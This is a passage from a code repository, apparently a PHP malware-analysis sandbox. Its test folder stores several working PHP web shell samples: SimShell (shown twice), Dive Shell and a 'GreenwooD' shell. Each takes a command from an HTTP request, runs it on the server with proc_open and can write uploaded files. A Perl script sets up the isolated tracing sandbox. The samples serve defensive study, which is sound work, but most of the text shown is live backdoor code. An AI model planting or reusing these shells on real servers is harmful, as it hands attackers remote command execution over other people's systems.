 74 | print "<input style=\"font-family: Verdana; font-size: 12px; width:50%;border: #000000; border-style: dotted; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" type=\"text\" name=\"cmd\" value=\"$cmd\">";
 75 | print " <input style = \"font-family: Verdana; font-size: 12px; background-color: #FFFFFF; border: #666666; border-style: solid; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" type=\"submit\" name=\"_run\" value=\"Run\">";
 76 | print "</form>";
 77 | 
 78 | //-------------------------------
 79 | 
 80 | print "<form  enctype=\"multipart/form-data\" action=\"$PHP_SELF\" method=\"post\">";
 81 | print "<font face=\"Verdana\" size=\"1\" color=\"#990000\">Upload:</font>";
 82 | print "<br>";
 83 | print "<input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"100000\">";
 84 | print "<font face=\"Verdana\" size=\"1\" color=\"#990000\">File: </font><input style=\"font-family: Verdana; font-size: 9px; background-color: #FFFFFF; border: #000000; border-style: dotted; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" name=\"userfile\" type=\"file\">";
 85 | print " <font face=\"Verdana\" size=\"1\" color=\"#990000\">Filename on server: </font> <input style=\"font-family: Verdana; font-size: 9px;background-color: #FFFFFF; border: #000000; border-style: dotted; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" name=\"serverfile\" type=\"text\">";
 86 | print" <input style =\"font-family: Verdana; font-size: 9px; background-color: #FFFFFF; border: #666666; border-style: solid; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" type=\"submit\" value=\"Send\">";
 87 | print"</form>";
 88 | 
 89 | ?>
 90 | 
 91 | 
 92 | <?
 93 | 
 94 | // Script for uploading
 95 |  if (is_uploaded_file($userfile)) {
 96 | move_uploaded_file($userfile, $serverfile);
 97 | }
 98 | 
 99 | ?>
100 | 
101 | 
102 | <center><font face="Verdana" size="1" color="#000000">Created by -:[GreenwooD]:- </font></center>
103 | </body></html>


--------------------------------------------------------------------------------
/t/malware/103.php:
--------------------------------------------------------------------------------
  1 | <?php
  2 | 
  3 | /*Simorgh Security Magazine */
  4 |   session_start();
  5 | if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset'])) {
  6 |     $_SESSION['cwd'] = getcwd();
  7 |     $_SESSION['history'] = array();
  8 |     $_SESSION['output'] = '';
  9 |   }
 10 |   
 11 |   if (!empty($_REQUEST['command'])) {
 12 |     if (get_magic_quotes_gpc()) {
 13 |       $_REQUEST['command'] = stripslashes($_REQUEST['command']);
 14 |     }
 15 |     if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== false)
 16 |       unset($_SESSION['history'][$i]);
 17 |     
 18 |     array_unshift($_SESSION['history'], $_REQUEST['command']);
 19 |   
 20 |     $_SESSION['output'] .= '$ ' . $_REQUEST['command'] . "\n";
 21 | 
 22 |     if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command'])) {
 23 |       $_SESSION['cwd'] = dirname(__FILE__);
 24 |     } elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'], $regs)) {
 25 | 
 26 |       if ($regs[1][0] == '/') {
 27 | 
 28 |         $new_dir = $regs[1];
 29 |       } else {
 30 | 
 31 |         $new_dir = $_SESSION['cwd'] . '/' . $regs[1];
 32 |       }
 33 |       
 34 | 
 35 |       while (strpos($new_dir, '/./') !== false)
 36 |         $new_dir = str_replace('/./', '/', $new_dir);
 37 | 
 38 | 
 39 |       while (strpos($new_dir, '//') !== false)
 40 |         $new_dir = str_replace('//', '/', $new_dir);
 41 | 
 42 |       while (preg_match('|/\.\.(?!\.)|', $new_dir))
 43 |         $new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir);
 44 |       
 45 |       if ($new_dir == '') $new_dir = '/';
 46 |       
 47 | 
 48 |       if (@chdir($new_dir)) {
 49 |         $_SESSION['cwd'] = $new_dir;
 50 |       } else {
 51 |         $_SESSION['output'] .= "cd: could not change to: $new_dir\n";
 52 |       }
 53 |       
 54 |     } else {
 55 | 
 56 |       chdir($_SESSION['cwd']);
 57 | 
 58 |       $length = strcspn($_REQUEST['command'], " \t");
 59 |       $token = substr($_REQUEST['command'], 0, $length);
 60 |       if (isset($aliases[$token]))
 61 |         $_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['command'], $length);
 62 |     
 63 |       $p = proc_open($_REQUEST['command'],
 64 |                      array(1 => array('pipe', 'w'),
 65 |                            2 => array('pipe', 'w')),
 66 |                      $io);
 67 | 
 68 | 
 69 |       while (!feof($io[1])) {
 70 |         $_SESSION['output'] .= htmlspecialchars(fgets($io[1]),
 71 |                                                 ENT_COMPAT, 'UTF-8');
 72 |       }
 73 | 
 74 |       while (!feof($io[2])) {
 75 |         $_SESSION['output'] .= htmlspecialchars(fgets($io[2]),
 76 |                                                 ENT_COMPAT, 'UTF-8');
 77 |       }
 78 |       
 79 |       fclose($io[1]);
 80 |       fclose($io[2]);
 81 |       proc_close($p);
 82 |     }
 83 |   }
 84 | 
 85 | 
 86 |   if (empty($_SESSION['history'])) {
 87 |     $js_command_hist = '""';
 88 |   } else {
 89 |     $escaped = array_map('addslashes', $_SESSION['history']);
 90 |     $js_command_hist = '"", "' . implode('", "', $escaped) . '"';
 91 |   }
 92 | 
 93 | 
 94 | header('Content-Type: text/html; charset=UTF-8');
 95 | 
 96 | echo '<?xml version="1.0" encoding="UTF-8"?>' . "\n";
 97 | ?>
 98 | 
 99 | <head>
100 |   <title>SimShell - Simorgh Security MGZ</title>
101 |   <link rel="stylesheet" href="Simshell.css" type="text/css" />
102 | 
103 |   <script type="text/javascript" language="JavaScript">
104 |   var current_line = 0;
105 |   var command_hist = new Array(<?php echo $js_command_hist ?>);
106 |   var last = 0;
107 | 
108 |   function key(e) {
109 |     if (!e) var e = window.event;
110 | 
111 |     if (e.keyCode == 38 && current_line < command_hist.length-1) {
112 |       command_hist[current_line] = document.shell.command.value;
113 |       current_line++;
114 |       document.shell.command.value = command_hist[current_line];
115 |     }
116 | 
117 |     if (e.keyCode == 40 && current_line > 0) {
118 |       command_hist[current_line] = document.shell.command.value;
119 |       current_line--;
120 |       document.shell.command.value = command_hist[current_line];
121 |     }
122 | 
123 |   }
124 | 
125 | function init() {
126 |   document.shell.setAttribute("autocomplete", "off");
127 |   document.shell.output.scrollTop = document.shell.output.scrollHeight;
128 |   document.shell.command.focus();
129 | }
130 | 
131 |   </script>
132 | </head>
133 | 
134 | <body   onload="init()" style="color: #00FF00; background-color: #000000">
135 | 
136 | <span style="background-color: #000000">
137 | 
138 | 
139 | 
140 | </body>
141 | 
142 | </body>
143 | </html>
144 | 
145 | 
146 | 
147 | </span>
148 | 
149 | 
150 | 
151 | <p><span style="background-color: #000000">&nbsp;Directory: </span> <code>
152 | <span style="background-color: #000000"><?php echo $_SESSION['cwd'] ?></span></code></p>
153 | 
154 | <form name="shell" action="<?php echo $_SERVER['PHP_SELF'] ?>" method="post">
155 | <div style="width: 900; height: 454">
156 | <textarea name="output" readonly="readonly" cols="120" rows="20" style="color: #CCFF33; border: 1px dashed #FF0000; background-color: #000000">
157 | <?php
158 | $lines = substr_count($_SESSION['output'], "\n");
159 | $padding = str_repeat("\n", max(0, $_REQUEST['rows']+1 - $lines));
160 | echo rtrim($padding . $_SESSION['output']);
161 | ?>
162 | </textarea>
163 | <p class="prompt" align="justify">
164 |   cmd:<input class="prompt" name="command" type="text"
165 |                 onkeyup="key(event)" size="60" tabindex="1" style="border: 1px dotted #808080">
166 |   <input type="submit" value="Enter" /><input type="submit" name="reset" value="Reset" /> Rows: 
167 |   <input type="text" name="rows" value="<?php echo $_REQUEST['rows'] ?>" size="5" />
168 | </p>
169 | <p class="prompt" align="center">
170 |   <br>
171 |   <br>
172 | &nbsp;<font color="#C0C0C0" size="2">Copyright 2004-Simorgh Security<br>
173 |   Make On PhpShell Kernel<br>
174 |   <a href="http://www.simorgh-ev.com" style="text-decoration: none">
175 |   <font color="#C0C0C0">www.simorgh-ev.com</font></a></font></p>
176 | </div>
177 | </form>
178 | 
179 | 
180 | </html>


--------------------------------------------------------------------------------
/t/malware/104.php:
--------------------------------------------------------------------------------
  1 | <?php
  2 | 
  3 | /*Simorgh Security Magazine */
  4 |   session_start();
  5 | if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset'])) {
  6 |     $_SESSION['cwd'] = getcwd();
  7 |     $_SESSION['history'] = array();
  8 |     $_SESSION['output'] = '';
  9 |   }
 10 |   
 11 |   if (!empty($_REQUEST['command'])) {
 12 |     if (get_magic_quotes_gpc()) {
 13 |       $_REQUEST['command'] = stripslashes($_REQUEST['command']);
 14 |     }
 15 |     if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== false)
 16 |       unset($_SESSION['history'][$i]);
 17 |     
 18 |     array_unshift($_SESSION['history'], $_REQUEST['command']);
 19 |   
 20 |     $_SESSION['output'] .= '$ ' . $_REQUEST['command'] . "\n";
 21 | 
 22 |     if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command'])) {
 23 |       $_SESSION['cwd'] = dirname(__FILE__);
 24 |     } elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'], $regs)) {
 25 | 
 26 |       if ($regs[1][0] == '/') {
 27 | 
 28 |         $new_dir = $regs[1];
 29 |       } else {
 30 | 
 31 |         $new_dir = $_SESSION['cwd'] . '/' . $regs[1];
 32 |       }
 33 |       
 34 | 
 35 |       while (strpos($new_dir, '/./') !== false)
 36 |         $new_dir = str_replace('/./', '/', $new_dir);
 37 | 
 38 | 
 39 |       while (strpos($new_dir, '//') !== false)
 40 |         $new_dir = str_replace('//', '/', $new_dir);
 41 | 
 42 |       while (preg_match('|/\.\.(?!\.)|', $new_dir))
 43 |         $new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir);
 44 |       
 45 |       if ($new_dir == '') $new_dir = '/';
 46 |       
 47 | 
 48 |       if (@chdir($new_dir)) {
 49 |         $_SESSION['cwd'] = $new_dir;
 50 |       } else {
 51 |         $_SESSION['output'] .= "cd: could not change to: $new_dir\n";
 52 |       }
 53 |       
 54 |     } else {
 55 | 
 56 |       chdir($_SESSION['cwd']);
 57 | 
 58 |       $length = strcspn($_REQUEST['command'], " \t");
 59 |       $token = substr($_REQUEST['command'], 0, $length);
 60 |       if (isset($aliases[$token]))
 61 |         $_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['command'], $length);
 62 |     
 63 |       $p = proc_open($_REQUEST['command'],
 64 |                      array(1 => array('pipe', 'w'),
 65 |                            2 => array('pipe', 'w')),
 66 |                      $io);
 67 | 
 68 | 
 69 |       while (!feof($io[1])) {
 70 |         $_SESSION['output'] .= htmlspecialchars(fgets($io[1]),
 71 |                                                 ENT_COMPAT, 'UTF-8');
 72 |       }
 73 | 
 74 |       while (!feof($io[2])) {
 75 |         $_SESSION['output'] .= htmlspecialchars(fgets($io[2]),
 76 |                                                 ENT_COMPAT, 'UTF-8');
 77 |       }
 78 |       
 79 |       fclose($io[1]);
 80 |       fclose($io[2]);
 81 |       proc_close($p);
 82 |     }
 83 |   }
 84 | 
 85 | 
 86 |   if (empty($_SESSION['history'])) {
 87 |     $js_command_hist = '""';
 88 |   } else {
 89 |     $escaped = array_map('addslashes', $_SESSION['history']);
 90 |     $js_command_hist = '"", "' . implode('", "', $escaped) . '"';
 91 |   }
 92 | 
 93 | 
 94 | header('Content-Type: text/html; charset=UTF-8');
 95 | 
 96 | echo '<?xml version="1.0" encoding="UTF-8"?>' . "\n";
 97 | ?>
 98 | 
 99 | <head>
100 |   <title>SimShell - Simorgh Security MGZ</title>
101 |   <link rel="stylesheet" href="Simshell.css" type="text/css" />
102 | 
103 |   <script type="text/javascript" language="JavaScript">
104 |   var current_line = 0;
105 |   var command_hist = new Array(<?php echo $js_command_hist ?>);
106 |   var last = 0;
107 | 
108 |   function key(e) {
109 |     if (!e) var e = window.event;
110 | 
111 |     if (e.keyCode == 38 && current_line < command_hist.length-1) {
112 |       command_hist[current_line] = document.shell.command.value;
113 |       current_line++;
114 |       document.shell.command.value = command_hist[current_line];
115 |     }
116 | 
117 |     if (e.keyCode == 40 && current_line > 0) {
118 |       command_hist[current_line] = document.shell.command.value;
119 |       current_line--;
120 |       document.shell.command.value = command_hist[current_line];
121 |     }
122 | 
123 |   }
124 | 
125 | function init() {
126 |   document.shell.setAttribute("autocomplete", "off");
127 |   document.shell.output.scrollTop = document.shell.output.scrollHeight;
128 |   document.shell.command.focus();
129 | }
130 | 
131 |   </script>
132 | </head>
133 | 
134 | <body   onload="init()" style="color: #00FF00; background-color: #000000">
135 | 
136 | <span style="background-color: #000000">
137 | 
138 | 
139 | 
140 | </body>
141 | 
142 | </body>
143 | </html>
144 | 
145 | 
146 | 
147 | </span>
148 | 
149 | 
150 | 
151 | <p><span style="background-color: #000000">&nbsp;Directory: </span> <code>
152 | <span style="background-color: #000000"><?php echo $_SESSION['cwd'] ?></span></code></p>
153 | 
154 | <form name="shell" action="<?php echo $_SERVER['PHP_SELF'] ?>" method="post">
155 | <div style="width: 900; height: 454">
156 | <textarea name="output" readonly="readonly" cols="120" rows="20" style="color: #CCFF33; border: 1px dashed #FF0000; background-color: #000000">
157 | <?php
158 | $lines = substr_count($_SESSION['output'], "\n");
159 | $padding = str_repeat("\n", max(0, $_REQUEST['rows']+1 - $lines));
160 | echo rtrim($padding . $_SESSION['output']);
161 | ?>
162 | </textarea>
163 | <p class="prompt" align="justify">
164 |   cmd:<input class="prompt" name="command" type="text"
165 |                 onkeyup="key(event)" size="60" tabindex="1" style="border: 1px dotted #808080">
166 |   <input type="submit" value="Enter" /><input type="submit" name="reset" value="Reset" /> Rows: 
167 |   <input type="text" name="rows" value="<?php echo $_REQUEST['rows'] ?>" size="5" />
168 | </p>
169 | <p class="prompt" align="center">
170 |   <br>
171 |   <br>
172 | &nbsp;<font color="#C0C0C0" size="2">Copyright 2004-Simorgh Security<br>
173 |   Make On PhpShell Kernel<br>
174 |   <a href="http://www.simorgh-ev.com" style="text-decoration: none">
175 |   <font color="#C0C0C0">www.simorgh-ev.com</font></a></font></p>
176 | </div>
177 | </form>
178 | 
179 | 
180 | </html>
181 | 


--------------------------------------------------------------------------------
/server/run.pl:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/perl
  2 | use strict;
  3 | use warnings;
  4 | use Data::Dumper;
  5 | use YAML;
  6 | use Text::Template;
  7 | use File::Basename qw/basename/;
  8 | use File::Path 'mkpath';
  9 | use File::Spec::Functions;
 10 | use Cwd 'getcwd';
 11 | use FindBin qw($Bin);
 12 | use lib "$Bin/../lib";
 13 | use K0U5UK3::Error qw($DEBUG $WARNING debug warning critical);
 14 | use K0U5UK3::Util qw(init_dir);
 15 | 
 16 | our $YAML = YAML::LoadFile("$Bin/../settings.yaml");
 17 | 
 18 | #-----------#
 19 | # SUB ROUTN #
 20 | #-----------#
 21 | sub msg($){
 22 |    my $msg = shift;
 23 |    print "[*] $msg\n";
 24 | }
 25 | 
 26 | sub generate_from_template($$){
 27 |    my $tmpl_file = shift;
 28 |    my $data = shift;
 29 | 
 30 |    my $template = Text::Template->new(SOURCE => "$tmpl_file");
 31 |    my $text = $template->fill_in(HASH => $data) or die "Faild fill in $tmpl_file\n";
 32 |    my $gen_file = basename $tmpl_file;
 33 | 
 34 |    my $write_file = catfile($YAML->{SETTING_DIR}, $gen_file);
 35 | 
 36 |    open my $fh, '>', $write_file or die "Faild write $write_file : $!\n";
 37 |    print $fh $text;
 38 |    close($fh);
 39 | 
 40 |    msg("$tmpl_file template file to $write_file");
 41 |    return $write_file;
 42 | }
 43 | 
 44 | #-------------#
 45 | # MAIN ROUTIN #
 46 | #-------------#
 47 | sub main(){
 48 |    # 解析対象PHPスクリプトを配置するディレクトリを作成する
 49 |    init_dir($YAML->{WEBROOT_DIR});
 50 |    # TRACELOG出力先ディレクトリを作成する
 51 |    init_dir($YAML->{TRACELOG_DIR});
 52 |    # 設定ファイル格納ディレクトリを作成する
 53 |    init_dir($YAML->{SETTING_DIR}); 
 54 |    # ログ格納ディレクトリを作成する
 55 |    init_dir($YAML->{LOG_DIR});
 56 | 
 57 |    my $sandbox_httpd_logfile = catfile($YAML->{LOG_DIR}, $YAML->{SANDBOX_HTTPD_LOGFILE});
 58 |    my $buitin_php_server_logfile = catfile($YAML->{LOG_DIR}, $YAML->{PHP_BUILTIN_SERVER_LOGFILE});
 59 | 
 60 |    # Templateからphp実行前処理と実行後処理を作成
 61 |    my $prepend_php = generate_from_template("./template/prepend.php", {TRACELOG_DIR => "$YAML->{TRACELOG_DIR}"});
 62 |    my $append_php = generate_from_template("./template/append.php", {});
 63 | 
 64 |    # Templateからphp.iniを作成
 65 |    my $custom_php = generate_from_template("./template/custom-php.ini", {PREPEND_PHP => "$prepend_php", APPEND_PHP => "$append_php"});
 66 | 
 67 |    # Templateからiptables.ruleを作成
 68 |    my $iptables_rule = generate_from_template("./template/iptables.rule", { SANDBOX_HTTPD_PORT  => "$YAML->{SANDBOX_HTTPD_PORT}" });
 69 | 
 70 |    # iptables設定の指示
 71 |    msg("以下のコマンドでSANDBOX_HTTPDとSSH以外の通信を遮断します。");
 72 |    msg("sudo iptables-restore $iptables_rule");
 73 |    msg("iptables設定をデフォルトに戻すには以下のコマンドを入力してください");
 74 |    msg("sudo /sbin/iptables -X");
 75 |    msg("sudo /sbin/iptables -P INPUT ACCEPT");
 76 |    msg("sudo /sbin/iptables -P OUTPUT ACCEPT");
 77 |    msg("sudo /sbin/iptables -P FORWARD ACCEPT");
 78 |    msg("sudo /sbin/iptables -F");
 79 | 
 80 |    if($YAML->{USE_SSL}){
 81 |       msg("HTTPSを使用するために秘密鍵、公開鍵、証明書を作成します。");
 82 |       system("openssl genrsa 2048 > server.key");
 83 |       system("openssl req -new -key server.key -out server.csr -subj '/C=JP/ST=Tokyo/L=Tokyo/O=Example Ltd./OU=Web/CN=example.com'");
 84 |       system("openssl x509 -in server.csr -days 365 -req -signkey server.key > server.crt");
 85 |       system("/bin/mv server.key server.csr server.crt $YAML->{SETTING_DIR}");
 86 |    } 
 87 | 
 88 |    if($YAML->{SANDBOX_HTTPD_ENGINE} eq 'APACHE'){
 89 |       # Apacheの設定ディレクトリを作成する
 90 |       init_dir($YAML->{APACHE_DIR});
 91 |       my $apache_conf = generate_from_template("./template/apache2.conf", {
 92 |          APACHE_DIR => $YAML->{APACHE_DIR},
 93 |          APACHE_USER => scalar getpwuid($>),
 94 |          APACHE_GROUP => scalar getgrgid($)),
 95 |          APACHE_ERR_LOGFILE => catfile($YAML->{LOG_DIR}, $YAML->{SANDBOX_HTTPD_ERRFILE}),
 96 |          APACHE_PORT => $YAML->{SANDBOX_HTTPD_PORT},
 97 |          APACHE_DOCUMENT_ROOT => $YAML->{WEBROOT_DIR},
 98 |          APACHE_ACCESS_LOGFILE => catfile($YAML->{LOG_DIR}, $YAML->{SANDBOX_HTTPD_LOGFILE}),
 99 |          SANDBOX_PSGI => catfile(getcwd(), "sandbox.psgi"),
100 |          PHP_INI_FILE => $custom_php,
101 |       });
102 | 
103 |       system("cp $apache_conf $YAML->{APACHE_DIR}"); 
104 | 
105 |       # 必要な設定ファイルをコピーする 
106 |       system("cp -r /etc/apache2/mods-available $YAML->{APACHE_DIR}");
107 |       system("cp -r /etc/apache2/mods-enabled $YAML->{APACHE_DIR}");
108 |       # Apacheを稼働させる
109 |       system("/usr/sbin/apache2 -d $YAML->{APACHE_DIR} -f apache2.conf");
110 |    }elsif($YAML->{SANDBOX_HTTPD_ENGINE} eq 'PLACK'){
111 |       # HTTPD_ENGINEにPLACKを使用する
112 |       if($YAML->{USE_SSL}){
113 |          # PLACKをHTTPSプロトコルで立ち上げる
114 |          system("/usr/bin/plackup -s HTTP::Server::PSGI --ssl-key-file $YAML->{SETTING_DIR}/server.key " . 
115 |                "--ssl-cert-file $YAML->{SETTING_DIR}/server.crt --ssl 1 sandbox.psgi " . 
116 |                "--host $YAML->{SANDBOX_HTTPD_HOST} --port $YAML->{SANDBOX_HTTPD_PORT} >> $sandbox_httpd_logfile 2>&1 &"); 
117 |       }else{
118 |          # PLACKをHTTPプロトコルで立ち上げる
119 |          system("/usr/bin/plackup sandbox.psgi --host $YAML->{SANDBOX_HTTPD_HOST} " . 
120 |                "--port $YAML->{SANDBOX_HTTPD_PORT} >> $sandbox_httpd_logfile 2>&1 &");
121 |       }
122 |    }elsif($YAML->{SANDBOX_HTTPD_ENGINE} eq 'STARMAN'){
123 |       # HTTPD_ENGINEにSTARMANを使用する
124 |       if($YAML->{USE_SSL}){
125 |          # STARMANをHTTPSプロトコルで立ち上げる
126 |          system("/usr/bin/plackup -s Starman -a sandbox.psgi --ssl-key-file $YAML->{SETTING_DIR}/server.key " . 
127 |                "--ssl-cert-file $YAML->{SETTING_DIR}/server.crt --ssl 1 " . 
128 |                "--host $YAML->{SANDBOX_HTTPD_HOST} --port $YAML->{SANDBOX_HTTPD_PORT} >> $sandbox_httpd_logfile 2>&1 &");
129 |       }else{
130 |          # STARMANをHTTPプロトコルで立ち上げる
131 |          system("/usr/bin/plackup -s Starman -a sandbox.psgi " . 
132 |                "--host $YAML->{SANDBOX_HTTPD_HOST} --port $YAML->{SANDBOX_HTTPD_PORT} >> $sandbox_httpd_logfile 2>&1 &");
133 |       }
134 |    }
135 | 
136 |    if($YAML->{SANDBOX_HTTPD_ENGINE} ne 'APACHE'){
137 |       # APACHE以外のHTTPD_ENGINEを使用するならPHP_BUILTIN_SERVERが必要
138 |       system("/usr/bin/php -t $YAML->{WEBROOT_DIR} -S $YAML->{PHP_BUILTIN_SERVER_HOST}:$YAML->{PHP_BUILTIN_SERVER_PORT} " . 
139 |             "-c $custom_php >> $buitin_php_server_logfile 2>&1 &");
140 |    }
141 | }
142 | 
143 | main ();
144 | 
145 | 


--------------------------------------------------------------------------------
/t/malware/29.php:
--------------------------------------------------------------------------------
  1 | <?php
  2 | 
  3 | /*Emperor Hacking TEAM */
  4 |   session_start();
  5 | if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset'])) {
  6 |     $_SESSION['cwd'] = getcwd();
  7 |     $_SESSION['history'] = array();
  8 |     $_SESSION['output'] = '';
  9 |   }
 10 |   
 11 |   if (!empty($_REQUEST['command'])) {
 12 |     if (get_magic_quotes_gpc()) {
 13 |       $_REQUEST['command'] = stripslashes($_REQUEST['command']);
 14 |     }
 15 |     if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== false)
 16 |       unset($_SESSION['history'][$i]);
 17 |     
 18 |     array_unshift($_SESSION['history'], $_REQUEST['command']);
 19 |   
 20 |     $_SESSION['output'] .= '$ ' . $_REQUEST['command'] . "\n";
 21 | 
 22 |     if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command'])) {
 23 |       $_SESSION['cwd'] = dirname(__FILE__);
 24 |     } elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'], $regs)) {
 25 | 
 26 |       if ($regs[1][0] == '/') {
 27 | 
 28 |         $new_dir = $regs[1];
 29 |       } else {
 30 | 
 31 |         $new_dir = $_SESSION['cwd'] . '/' . $regs[1];
 32 |       }
 33 |       
 34 | 
 35 |       while (strpos($new_dir, '/./') !== false)
 36 |         $new_dir = str_replace('/./', '/', $new_dir);
 37 | 
 38 | 
 39 |       while (strpos($new_dir, '//') !== false)
 40 |         $new_dir = str_replace('//', '/', $new_dir);
 41 | 
 42 |       while (preg_match('|/\.\.(?!\.)|', $new_dir))
 43 |         $new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir);
 44 |       
 45 |       if ($new_dir == '') $new_dir = '/';
 46 |       
 47 | 
 48 |       if (@chdir($new_dir)) {
 49 |         $_SESSION['cwd'] = $new_dir;
 50 |       } else {
 51 |         $_SESSION['output'] .= "cd: could not change to: $new_dir\n";
 52 |       }
 53 |       
 54 |     } else {
 55 | 
 56 |       chdir($_SESSION['cwd']);
 57 | 
 58 |       $length = strcspn($_REQUEST['command'], " \t");
 59 |       $token = substr($_REQUEST['command'], 0, $length);
 60 |       if (isset($aliases[$token]))
 61 |         $_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['command'], $length);
 62 |     
 63 |       $p = proc_open($_REQUEST['command'],
 64 |                      array(1 => array('pipe', 'w'),
 65 |                            2 => array('pipe', 'w')),
 66 |                      $io);
 67 | 
 68 | 
 69 |       while (!feof($io[1])) {
 70 |         $_SESSION['output'] .= htmlspecialchars(fgets($io[1]),
 71 |                                                 ENT_COMPAT, 'UTF-8');
 72 |       }
 73 | 
 74 |       while (!feof($io[2])) {
 75 |         $_SESSION['output'] .= htmlspecialchars(fgets($io[2]),
 76 |                                                 ENT_COMPAT, 'UTF-8');
 77 |       }
 78 |       
 79 |       fclose($io[1]);
 80 |       fclose($io[2]);
 81 |       proc_close($p);
 82 |     }
 83 |   }
 84 | 
 85 | 
 86 |   if (empty($_SESSION['history'])) {
 87 |     $js_command_hist = '""';
 88 |   } else {
 89 |     $escaped = array_map('addslashes', $_SESSION['history']);
 90 |     $js_command_hist = '"", "' . implode('", "', $escaped) . '"';
 91 |   }
 92 | 
 93 | 
 94 | header('Content-Type: text/html; charset=UTF-8');
 95 | 
 96 | echo '<?xml version="Dive.0.1" encoding="UTF-8"?>' . "\n";
 97 | ?>
 98 | 
 99 | <head>
100 |   <title>Dive Shell - Emperor Hacking Team</title>
101 |   <link rel="stylesheet" href="Simshell.css" type="text/css" />
102 | 
103 |   <script type="text/javascript" language="JavaScript">
104 |   var current_line = 0;
105 |   var command_hist = new Array(<?php echo $js_command_hist ?>);
106 |   var last = 0;
107 | 
108 |   function key(e) {
109 |     if (!e) var e = window.event;
110 | 
111 |     if (e.keyCode == 38 && current_line < command_hist.length-1) {
112 |       command_hist[current_line] = document.shell.command.value;
113 |       current_line++;
114 |       document.shell.command.value = command_hist[current_line];
115 |     }
116 | 
117 |     if (e.keyCode == 40 && current_line > 0) {
118 |       command_hist[current_line] = document.shell.command.value;
119 |       current_line--;
120 |       document.shell.command.value = command_hist[current_line];
121 |     }
122 | 
123 |   }
124 | 
125 | function init() {
126 |   document.shell.setAttribute("autocomplete", "off");
127 |   document.shell.output.scrollTop = document.shell.output.scrollHeight;
128 |   document.shell.command.focus();
129 | }
130 | 
131 |   </script>
132 | </head>
133 | 
134 | <body   onload="init()" style="color: #00FF00; background-color: #000000">
135 | 
136 | <span style="background-color: #FFFFFF">
137 | 
138 | 
139 | 
140 | </body>
141 | 
142 | </body>
143 | </html>
144 | 
145 | 
146 | 
147 | </span>
148 | 
149 | 
150 | 
151 | <p><font color="#FF0000"><span style="background-color: #000000">&nbsp;Directory: </span> <code>
152 | <span style="background-color: #000000"><?php echo $_SESSION['cwd'] ?></span></code>
153 | </font></p>
154 | 
155 | <form name="shell" action="<?php echo $_SERVER['PHP_SELF'] ?>" method="POST" style="border: 1px solid #808080">
156 | <div style="width: 989; height: 456">
157 |   <p align="center"><b>
158 |   <font color="#C0C0C0" face="Tahoma">Command:</font></b><input class="prompt" name="command" type="text"
159 |                 onkeyup="key(event)" size="88" tabindex="1" style="border: 4px double #C0C0C0; ">
160 |   <input type="submit" value="Submit" /> &nbsp;<font color="#0000FF">
161 |   </font>
162 |   &nbsp;<textarea name="output" readonly="readonly" cols="107" rows="22" style="color: #FFFFFF; background-color: #000000">
163 | <?php
164 | $lines = substr_count($_SESSION['output'], "\n");
165 | $padding = str_repeat("\n", max(0, $_REQUEST['rows']+1 - $lines));
166 | echo rtrim($padding . $_SESSION['output']);
167 | ?>
168 | </textarea> </p>
169 | <p class="prompt" align="center">
170 |   <b><font face="Tahoma" color="#C0C0C0">Rows:</font><font face="Tahoma" color="#0000FF" size="2"> </font></b> 
171 |   <input type="text" name="rows" value="<?php echo $_REQUEST['rows'] ?>" size="5" /></p>
172 | <p class="prompt" align="center">
173 |   <b><font color="#C0C0C0" face="SimSun">Edited By Emperor Hacking Team</font></b></p>
174 | <p class="prompt" align="center">
175 |   <font face="Tahoma" size="2" color="#808080">iM4n - FarHad - imm02tal - R$P</font><font color="#808080"><br>
176 | &nbsp;</font></p>
177 | </div>
178 | </form>
179 | 
180 | 
181 | <p class="prompt" align="center">
182 |   <b><font color="#000000">&nbsp;</font><font color="#000000" size="2"> </font>
183 |   </b></p>
184 | 
185 | 
186 | 
187 | </html>


--------------------------------------------------------------------------------
/t/malware/30.php:
--------------------------------------------------------------------------------
  1 | <?php
  2 | 
  3 | /*Emperor Hacking TEAM */
  4 |   session_start();
  5 | if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset'])) {
  6 |     $_SESSION['cwd'] = getcwd();
  7 |     $_SESSION['history'] = array();
  8 |     $_SESSION['output'] = '';
  9 |   }
 10 |   
 11 |   if (!empty($_REQUEST['command'])) {
 12 |     if (get_magic_quotes_gpc()) {
 13 |       $_REQUEST['command'] = stripslashes($_REQUEST['command']);
 14 |     }
 15 |     if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== false)
 16 |       unset($_SESSION['history'][$i]);
 17 |     
 18 |     array_unshift($_SESSION['history'], $_REQUEST['command']);
 19 |   
 20 |     $_SESSION['output'] .= '$ ' . $_REQUEST['command'] . "\n";
 21 | 
 22 |     if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command'])) {
 23 |       $_SESSION['cwd'] = dirname(__FILE__);
 24 |     } elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'], $regs)) {
 25 | 
 26 |       if ($regs[1][0] == '/') {
 27 | 
